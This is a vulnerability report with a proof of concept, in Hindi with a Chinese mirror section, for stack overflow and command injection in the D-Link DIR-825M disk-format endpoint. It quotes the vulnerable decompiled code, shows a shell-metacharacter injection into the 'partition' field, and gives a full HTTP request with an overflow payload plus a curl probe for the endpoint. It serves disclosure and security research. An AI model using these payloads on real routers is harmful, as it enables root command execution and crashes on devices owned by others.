
D-Link DIR-825M में स्टैक बफर ओवरफ्लो और /boafrm/formDiskFormat में कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो फर्मवेयर v1.1.8 पर रूट के रूप में रिमोट कोड निष्पादन को सक्षम करता है।
| फ़ील्ड | मान |
|---|---|
| विक्रेता | D-Link |
| उत्पाद | D-Link DIR-825M (और अन्य मॉडल जो समान फर्मवेयर कोडबेस साझा करते हैं) |
| प्रभावित संस्करण | फर्मवेयर v1.1.8 |
| भेद्यता प्रकार | स्टैक-आधारित बफर ओवरफ्लो (CWE-121)、कमांड इंजेक्शन (CWE-78) |
| विक्रेता होमपेज | https://www.dlink.com/ |
राउटर के फर्मवेयर की सुरक्षा समीक्षा के दौरान, /boafrm/formDiskFormat एंडपॉइंट में एक गंभीर भेद्यता की पहचान की गई।
भेद्यता sub_46725C फ़ंक्शन में स्थित है, जो पार्टीशन फ़ॉर्मेटिंग को संभालता है। फ़ंक्शन HTTP POST अनुरोध से उपयोगकर्ता-नियंत्रित partition पैरामीटर प्राप्त करता है। इस पैरामीटर पर किसी भी पूर्व सैनिटाइज़ेशन, सत्यापन, या लंबाई जांच के बिना, प्रोग्राम कई असुरक्षित ऑपरेशन करता है:
v9 (केवल 132 बाइट्स आवंटित) में फ़ॉर्मेट करने के लिए sprintf का उपयोग करता है।system() में पास करता है।एक हमलावर partition पैरामीटर में शेल मेटाकैरेक्टर (जैसे ;, &, या |) इंजेक्ट करके रूट विशेषाधिकारों के साथ मनमाने सिस्टम कमांड निष्पादित कर सकता है, या स्टैक बफर ओवरफ्लो और कंट्रोल फ्लो हाइजैक करने के लिए अत्यधिक बड़ी स्ट्रिंग पास कर सकता है।
/boafrm/formDiskFormat (या समान डिस्क फ़ॉर्मेट हैंडलिंग एंडपॉइंट)sub_46725Cभेद्यता दो समवर्ती प्रोग्रामिंग दोषों से उत्पन्न होती है: असुरक्षित स्ट्रिंग फ़ॉर्मेटिंग और सिस्टम शेल में अमान्य इनपुट का सीधा निष्पादन।

sub_46725C के अंदर, partition पैरामीटर प्राप्त किया जाता है और v2 में संग्रहीत किया जाता है:
v2 = (const char *)sub_41351C(a1, "partition", "");
यदि पैरामीटर खाली नहीं है, तो प्रोग्राम तुरंत एक अनमाउंट कमांड बनाता है और उसे निष्पादित करता है:
sprintf(v9, "umount /dev/%s >/dev/null 2>&1", v2);
system(v9);
चूंकि v2 को ; जैसे वर्णों को सैनिटाइज़ किए बिना सीधे कमांड स्ट्रिंग में एम्बेड किया जाता है, sda1;+sleep+5; का इनपुट इस प्रकार निष्पादित होगा:
umount /dev/sda1; sleep 5; >/dev/null 2>&1
यह सीधे मनमाने शेल कमांड निष्पादन को ट्रिगर करता है।
स्थानीय बफर v9 सीमित आकार के साथ स्टैक पर घोषित किया गया है:
char v9[132];
प्रोग्राम उपयोगकर्ता इनपुट को v9 में कॉपी करने के लिए sprintf का उपयोग करता है:
sprintf(v9, "mkdir -p /var/tmp/usb/%s >/dev/null 2>&1", v2);
क्योंकि sprintf बाउंड्स चेकिंग नहीं करता है, लगभग 90 बाइट्स से अधिक लंबा partition पैरामीटर v9 की सीमा से आगे लिखेगा, स्टैक फ्रेम को अधिलेखित कर देगा, जिसमें सहेजा गया फ्रेम पॉइंटर और रिटर्न एड्रेस (MIPS/ARM में $ra) शामिल है।
एक हमलावर इस भेद्यता का शोषण करके निम्नलिखित परिणाम प्राप्त कर सकता है:
root) विशेषाधिकारों के साथ मनमाने शेल कमांड निष्पादित करें।अत्यधिक बड़ा partition पैरामीटर प्रदान करके, स्टैक दूषित हो जाएगा, जिसके परिणामस्वरूप सेगमेंटेशन फॉल्ट होगा और वेब सर्वर डेमॉन क्रैश हो जाएगा।
POST /boafrm/formDiskFormat HTTP/1.1
Host: 192.168.0.1
Content-Length: 655
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.1/diskformat.htm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: webuicookie=16041526311804289383
Connection: keep-alive
partition=sda1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&systype=ext2&Apply+Changes=Apply+Changes&submit_url=%2Fdiskinfo.htm


本仓库为 CVE-2026-82592(D-Link DIR-825M 磁盘格式化接口栈溢出 + 命令注入 RCE) 漏洞 PoC 的中转分发镜像(技术分析见上方上游原版报告 formDiskFormat.md)。内容由上游公开 PoC 报告镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。
POST /boafrm/formDiskFormatpartition 参数注入 shell 元字符(命令注入),或发送超长填充(栈溢出)核心原理:处理分区格式化的 sub_46725C 函数把用户可控的 partition 参数直接拼进两条命令——sprintf(v9, "mkdir -p /var/tmp/usb/%s ...", v2)(v9 仅 132 字节,无边界检查,超 ~90 字节即覆盖 $ra)与 sprintf(v9, "umount /dev/%s ...", v2); system(v9)(; & | 等元字符原样进 shell)。
curl -s -o /dev/null -w "%{http_code}" http://<路由器IP>/boafrm/formDiskFormat
# 返回 200 或 302(而非 404)说明接口存在
POST /boafrm/formDiskFormat HTTP/1.1
Content-Type: application/x-www-form-urlencoded
partition=sda1aaaa...(超长填充)&systype=ext2&Apply+Changes=Apply+Changes&submit_url=%2Fdiskinfo.htm
本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以 root 权限执行命令或使设备 Web 服务崩溃,请在可销毁的仿真环境中测试。
reports/Dlink/formDiskFormat/)。LICENSE)。